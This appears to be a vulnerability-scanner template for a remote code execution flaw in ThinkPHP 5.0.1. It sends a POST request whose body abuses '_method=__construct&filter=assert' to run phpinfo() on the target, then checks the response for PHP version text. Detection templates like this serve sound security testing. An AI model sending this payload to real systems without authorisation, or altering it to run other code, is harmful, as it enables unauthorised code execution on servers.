id: thinkphp-501-rce

info:
  name: ThinkPHP 5.0.1 RCE
  author: lark-lab
  severity: critical
  description: A vulnerability in ThinkPHP allows remote unauthenticated attackers to cause the product to execute arbitrary code via the 's' parameter.
  tags: thinkphp,rce

http:
  - method: POST
    path:
      - "{{BaseURL}}/?s=index/index/index"
    body: "s=phpinfo()&_method=__construct&filter=assert"
    headers:
      Content-Type: application/x-www-form-urlencoded

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "PHP Extension"
          - "PHP Version"
        condition: and

      - type: status
        status:
          - 200
